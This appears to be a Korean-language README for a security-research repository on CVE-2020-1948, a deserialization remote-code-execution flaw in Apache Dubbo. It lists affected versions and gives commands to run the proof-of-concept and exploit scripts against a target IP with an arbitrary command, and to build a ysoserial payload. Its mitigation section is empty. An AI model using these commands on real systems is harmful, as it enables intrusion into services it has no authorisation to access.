
[CVE-2020-1948] Apache Dubbo Provider 기본 역직렬화로 인한 RCE
이 저장소는 주로 CVE-2020-1948에 초점을 맞춘 Apache Dubbo 역직렬화 취약점과 관련된 연구 자료, 개념 증명 코드 및 익스플로잇 도구를 포함합니다.
Apache Dubbo 2.7.8, 2.6.9, 2.5.10 이전 버전은 안전하지 않은 역직렬화로 인해 원격 코드 실행 공격(CVE-2020-1948)에 취약합니다. 이 취약점은 적절한 검증 없이 Java 네이티브 직렬화를 사용하는 Dubbo Provider 구성 요소에 영향을 미칩니다.
이 취약점은 여러 벡터를 통해 악용될 수 있습니다:
# Clone and build a vulnerable Dubbo version
cd dubbo-dubbo-2.7.5
mvn clean package
# Run the proof of concept
python dubboPoc.py -t <target_ip> -p <target_port>
# Run the exploit
python dubboExp.py -t <target_ip> -p <target_port> -c "command_to_execute"
ysoserial.jar를 사용하여 사용자 정의 페이로드를 생성할 수 있습니다:
java -jar ysoserial.jar CommonsCollections1 "command_to_execute" > payload.ser
이러한 취약점으로부터 보호하려면:
이 저장소는 보안 연구 및 교육 목적으로만 제공됩니다. 제공된 코드와 도구는 테스트 권한이 있는 시스템에 대해서만 사용해야 합니다. 이 정보의 오용에 대한 책임은 저장소 소유자에게 있지 않습니다.